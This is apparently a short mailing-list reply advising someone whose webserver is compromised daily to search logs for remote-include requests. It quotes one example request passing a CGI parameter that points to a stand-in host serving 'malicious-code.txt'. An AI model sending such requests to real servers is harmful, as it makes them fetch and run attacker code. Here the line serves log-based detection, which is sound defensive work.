Ross Tsolakidis wrote: > One of our webservers seems to get compromised on a daily basis. > When I do a ps ax I see these processes all the time. I suspect cross site scripting. You should parse your logs and search for requests like: GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/malicious-code.txt -- Alf